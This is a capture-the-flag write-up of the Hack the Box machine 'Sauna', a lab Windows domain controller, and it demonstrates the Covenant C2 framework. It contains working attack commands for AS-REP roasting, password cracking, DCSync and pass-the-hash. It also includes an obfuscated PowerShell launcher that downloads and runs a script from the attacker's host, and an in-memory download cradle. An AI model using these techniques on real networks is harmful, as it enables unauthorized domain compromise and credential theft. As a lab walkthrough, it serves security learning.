Hack the Box — Sauna Write-up(w/ Covenant C2)

InfoSec Write-ups
Published in
15 min readJul 18, 2020



Sauna is an Easy-difficulty machine from Hack the Box created by egotisticalSW. I felt that this box is realistic as it requires you to craft potential usernames based from their public website. I also decided to show a C2 framework, in which I chose Covenant, which is also the same C2 I used in the Offshore labs from Hack the Box.

To summarize the steps taken to solve the box:

Initial foothold:

  • Generate potential usernames through common conventions used
  • Identify user vulnerable to AS-REP roasting
  • User is part of Remote Management Users, login using WinRM

Fsmith → svc_loanmgr

  • Enumerate and identify credentials left in Windows AutoLogon registry

svc_loanmgr →Administrator

  • User has GetChanges-All rights to the domain
  • DCSync


I first run masscan to quickly identify open ports:

sudo masscan -p1-65535,U:1-65535 --rate=1000 -e tun0

Based on the open ports such as 53,389,636, I can safely assume that this box is a Windows Server functioning as a Domain Controller. I then proceed on running a default nmap scan:

sudo nmap -sV -sC -oA nmap/initial -vv -n

Nothing that interesting returns aside that there port 80 is open. The scan also gives me that the domain is EGOTISTICAL-BANK. I then decided to enumerate some common Windows protocols first.

Windows RPC — Port 135

I tried to establish a NULL session using rpcclient. This doesn’t work anymore in modern Windows systems but you’ll never know if it allows you to enumerate information about the host or domain itself. I get access denied when trying to list domain users.

I then tried lsaquery to get the Domain SID. I also tried to domain names to SID using lookupnames, but get access denied.

rpcclient $> lsaquery
Domain Sid: S-1-5-21-2966785786-3096785034-1186376766
rpcclient $> lookupnames administrator

I then moved on to LDAP.

LDAP — Port 389

LDAP can be enumerate in a lot of ways. I can use ldapsearch which is usually available in most Linux boxes, or use nmap scripts specific for LDAP. I used ldapsearch and tried to bind as an anonymous user, specifiying the base as scope:

ldapsearch -x -h -s base

I wasn’t able to get a lot, I also snipped the output for brevity. Some useful information from the output mentions that the domainFunctionality, forestFunctionality, and domainControllerFunctionality is 7.

domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7

Port 445 — SMB

To enumerate SMB, I used smbclient, listing the shares using the -L flag. I find that I can authenticate anonymously, but can’t list any shares.

Finding nothing that interesting, I proceeded to enumerate HTTP.

HTTP — Port 80

Viewing the webpage, it seems that the company is a bank.

Scrolling further down, I find pictures of clients and mentions that “… I can’t even get a ticket to roast my chestnuts” . This hints that I have to do something with “roasting”. In the context of Active Directory attacks, AS-REP roast and Kerberosting comes into mind.


I then ran a directory brute force on the page using dirsearch, specifiying to check for files with aspx,html, and txt extensions. I found nothing interesting.

I then browsed the websites and found /about.html which mentions some posts by Admin.


I also found /contact.html which has a contact form. I tried sending random data and intercepted it using Burp:


Checking the request through Burp:

Sending the request results to error 405 . The means POST method is not allowed, so this contact form is a dead end.

Checking other pages, I found /about.html . It mentions a few users that are a part of their team and a rant. It also gives us a few names which we can try to generate usernames from.

Checking the other content from the web page, there seems to be nothing useful and are just placeholders.

AS-REP roasting

Knowing that I have a few names, I can try to generate a wordlist of potential username conventions. Since there are no other services which we can authenticate or login with, this most likely means that I need to authenticate to AD. Since there are a few hints on “roasting”, I decided to try out AS-REP roasting. AS-REP roasting is an attack on Kerberos where you can request data that is encrypted by the user whose PREAUTH is not enabled. I explained more of the concept of that on my Forest write-up. So the names I have are the following:

fergus smith
hugo bear
steven kerb
shaun coins
bowie taylor
sophie driver

One common way of deriving usernames from full names is separating the firstname and lastname with a “dot”, like this:


Another common way is using the first letter of the first name followed by a dot, then the last name, like this:


Another way is to just use the first letter of the first name appended by the last name, like this:


Having three possible pattern of usernames, I created a single wordlist:


I then proceeded to check for users that are vulnerable to AS-REP roasting using impacket’s GetNPUsers:

/opt/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users1.txt -dc-ip

This results to the user fsmith responding with an AS-REP, which we can crack using hashcat later on. Even if this technique doesn’t return a user that is vulnerable, this can help you identify valid domain users. Notice that when the error is KDC_ERR_C_PRINCIPAL_UNKNOWN, that user is not a valid domain user. This can be verified by testing using the Administrator username, which I am sure exists:

/opt/impacket/examples/GetNPUsers.py EGOTISTICAL-BANK.LOCAL/Administrator -dc-ip

The response is UF_DONT_REQUIRE_PREAUTH set, which means that PREAUTH is enabled for that user. Moving on, I place the returned AS-REP on a text file and will crack it using hashcat:

hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt --force

The password for the user fsmith is Thestrokes23 .

I then use crackmapexec(cme) to check if the credentials are valid, and also check the domain’s password policy which is not that useful anymore in this CTF context, but in a real pentest, this gives you valuable information such regarding account lockouts and minimum password length enforced in the domain.

/opt/cme smb -d EGOTISTICAL-BANK -u fsmith -p Thestrokes23 --pass-pol

I also checked the shares available using cme:

I also checked it using smbmap:

/opt/smbmap/smbmap.py -H -u fsmith -p Thestrokes23

Why I did it twice? Because I wanted to show how you can achive one thing using different tools. So when either one of cme or smbmap or smbclient(I used it above) fails, there are still options that I can use to achieve my goal.

Before checking out those shares, I proceeded to enumerate LDAP first since I can now authenticate to the domain:

ldapdomaindump -u "egotistical-bank\fsmith" -p Thestrokes23  -o ldapdomaindump/ --no-json --no-grep

Checking the html output, it shows the list of domain users and their memberships. It is notable that fsmith is a part of Remote Management Users, which means that user most likely can do PSRemoting on the box. There is also another user svc_loanmgr, which is not mentioned in the web page(of course because it’s a service account).

From the output of ldapdomaindump, you can see that DONT_REQ_PREAUTH is set for fsmith, leading to that user being vulnerable to AS-REP roasting.

There are various ways I can interact with PSRemoting which runs on port 5985 or 5986(SSL) . Since I’m using Kali, the go-to is Evil-WinRM. I now have an initial foothold on the box.

I then list files and directories recursively with a depth of 3 under the C:\users directory. Gci is a shortcut to Get-ChildItem in PowerShell. It’s basically dir on Windows CMD or ls in Bash.

*Evil-WinRM* PS C:\Users\FSmith\Documents> gci -path c:\users\ -recurse -depth 3

I find users on the box:

I also find the user.txt which is under fsmith’s Desktop:

fsmith → svc_loanmgr

To enumerate how I can escalate privileges, I used Seatbelt, which is a tool to check common Windows configurations. I put that file on my Python http server and download it on the box.

*Evil-WinRM* PS C:\Users\FSmith\Documents> iwr -uri -o ..\music\s.exe

I run Seatbelt with -group=all options, cause I want the blue team to find me LOL. Note that this is very noisy, so in a real engagement, don’t run -group=all option.

One notable finding are the credentials left on WindowsAutoLogon. This is usually a misconfiguration because of the convenience it gives. You can read more about it here.

Microsoft mentions that this is a security risk:

If you set a computer for autologon, anyone who can physically obtain access to the computer can gain access to all the computer’s contents, including any networks it is connected to. Additionally, when autologon is turned on, the password is stored in the registry in plain text. The specific registry key that stores this value can be remotely read by the Authenticated Users group. This setting is recommended only for cases in which the computer is physically secured and steps have been taken to make sure that untrusted users cannot remotely access the registry.

I then log in to the box as svc_loanmgr . I then proceeded to loading Powerview on the box.

iex(new-object net.webclient).downloadString('')

I also checked if the script was loaded properly by running Get-DomainUser against svc_loanmgr:

get-domainuser -identity svc_loanmgr

When I initially solved this box, I used Bloodhound, which will clearly show you that the user svc_loanmgr can DCSync and get the domain hashes. But for the purpose of this write-up and to add flavor, I’ll be using Covenant, a C2 framework written in C#(this means its implants only works on Windows hosts) as there are few write-ups on how to set it up, and I’ll also be demonstrating its basic functionalities. If you are in a real environment where there are hundreds to thousands of PCs, you can’t be catching your shells using just netcat or Metasploit because as you get deeper into the environment, shells and sessions gets harder to manage. Hence the use of a C2 framework.

Using Covenant:

To use Covenant, I need to clone it first from the Github repo. The steps to install it can be found here. I’ll be doing option 1. Cloning the repo:

git clone --recurse-submodules https://github.com/cobbr/Covenant

I also need to download dotnet. Note, download the specific version of dotnet mentioned in the repo.

After extracting its contents, I make it executable, and build Covenant using dotnet build . If everything goes well, you should see build succeeded. Then I dotnet run while on the Covenant/Covenant directory to launch Covenant. By default, it listens on port 7443. It is also ideal to run it on elevated privileges so you can use common TCP ports for your listeners.

Visiting https://<yourIP>:7443, it prompts a warning because Covenant uses a self-signed certificate, which is fine:

After accepting, it is needed to register an initial user. You can add more users later on.

Covenant’s dashboard is simple. It shows you your Grunts, Listeners, and Taskings. A grunt is your current “implant” running on a victim machine. Listeners are where the implant calls back to, and the Taskings are the commands or modules assigned to your Grunts. I suggest you read the documentation on the Github repo for more details.

The first step is to create a listener:

Pressing create, I can give my listener a name which is useful for identifying which listener is used for what. I also set the connect address to my Hack the Box IP:

Now, I can see that there is a listener called Sauna, which is still Uninitialized. This is because I ran Covenant as a non-elevated user, which prevented Covenant to use port 80(a common port). If I ran Covenant as an elevated user or chose a higher port, the status would be Active.

Checking the terminal where I ran Covenant, I see “permission denied”, due to the reasons mentioned above.

I did that intentionally to demonstrate possible issues when you are setting up Covenant. I re-ran Covenant this time as an elevated user, and created a listener on port 9000(in a real engagement, use a common port such as 53,80, or 443. But make sure you setup a trusted cert for HTTPs). See that the status is Active.

Now that I have a listener, the next step is to choose a Launcher. Launchers is what I’ll use to launch a Grunt. This can be done in various ways, listed below:

For example, I can use a Binary Launcher to start-off a Grunt.

Choose generate to create a Launcher:

There are various ways to put the Binary Launcher on the victim box. I can either download the binary and transfer it through HTTP or SMB or whatever. I can also rename the file:

I can also use the Listener created to host the file.

Or even check the code used, which can be handy in building your own Grunts for evasion purposes.

I can also start a Grunt using a PowerShell Launcher:

Pressing generate, it creates two PowerShell one-liners, one of which is an encoded. I can just paste this on a session I have on the victim box.

I used the PowerShell launcher. Now on my Covenant dashboard, I get a notification that a Grunt has been activated:

Checking the properties of the Grunt, it shows useful information such as the domain name, current user, hostname, IP address, Windows version, and time details.

After selecting a Grunt, there are various tabs such as Info, Interact, Task, and Taskings. Info is what I showed above.

Interact is a terminal which can be used to interact with the Grunt. For example, using the ShellCmd task, I can run whoami:

Task is a “GUI” version of Interact:


And finally Taskings(populated by the task I ran below) which lists all the tasks assigned to this Grunt:

Taskings tab

I can then give the Grunt a task, which you have many options I’ll let you explore this on your own. Seatbelt is also available here, so I run the same command which is “-group=all”.

Task tab

I can then select a specific task under Taskings, and view its status or output. This is also reflected in the Interact tab.

I then launch another Grunt, this time on my WinRM session as svc_loanmgr. I get a callback, and I can see I have two Grunts:

One strength of using a C2 is I can import a PowerShell script through the Grunt. I can assign a task called “PowerShellImport”. In this case, I’ll be importing Powerview.

I can also host any file, in this case Powerview with a file name of 1.ps1.

After pressing create, it generated a PowerShell one-liner to load the script in memory using the famous iex(Invoke-Expression).

Since I already knew previously that svc_loanmgr has DCSync rights, I can then assign a task for my Grunt to use DCSync, which uses the Mimikatz binary. No need to drop Mimikatz binary on the system or load Invoke-Mimikatz!

I then see the Administrator hash:

Another cool feture of Covenant is it can store credentials gathered using Grunts and can list also indicators that can be helpful in a real engagement.

Now that I have an Administrator’s hash, I can do pass-the-hash. I used cme to execute a PowerShell command, which is an encoded PowerShell launcher:

sudo /opt/cme smb -d egotistical-bank.local -u administrator -H 'd9485863c1e9e05851aa40cbb4ab9dff' -X "powershell -Sta -Nop -Window Hidden -EncodedCommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMwA6ADkAMAAwADAALwBhAC4AcABzADEAJwApAA=="

I then get a notification that a Grunt is activated:

Checking my Grunts:

I then interact with the Grunt that runs as Administrator, and read the flags from there.

This concludes my write-up. I hope you learned something new! Thanks for reading! 🍺

